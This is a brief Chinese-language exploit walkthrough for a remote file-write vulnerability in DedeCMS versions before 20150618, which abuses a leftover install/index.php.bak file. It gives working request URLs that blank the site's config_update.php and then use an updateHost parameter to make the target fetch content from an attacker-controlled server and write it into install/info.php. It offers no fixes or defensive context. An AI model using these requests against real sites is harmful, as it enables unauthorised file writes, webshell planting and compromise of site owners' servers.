Dedecms远程写文件漏洞

0x00 关于漏洞 Dedecms在20150618之前的版本都存在远程写文件漏洞,主要起因是Apache的解析漏洞 0x01 利用条件 dedecms版本为20150618之前的 安装目录install下的index.php.bak文件未被删除 0x02 实例 查看cms版本 清空文件 http://www.xxxx.com/install/index.php.bak?step=11&insLockfile=a &s_lang=a&install_demo_name=../data/admin/config_update.php 访问上面的链接会使服务器到http://updatenew.dedecms.com/base-v57/dedecms/ demodata.a.txt中读取内容写入到config_update.php,但demodata.a.txt为空, 所以就清空了config_update.php 在自己的服务器上创建文件 写入文件 访问http://www.xxxx.com/install/index.php.bak?step=11&insLockfile=a &s_lang=a&install_demo_name=info.php&updateHost=http://123.123.123.123/ 将自己的网站的dedecoms/demodata.a.txt写入到目标站点的install/下的info.php中 访问生成的文件



可以返回顶部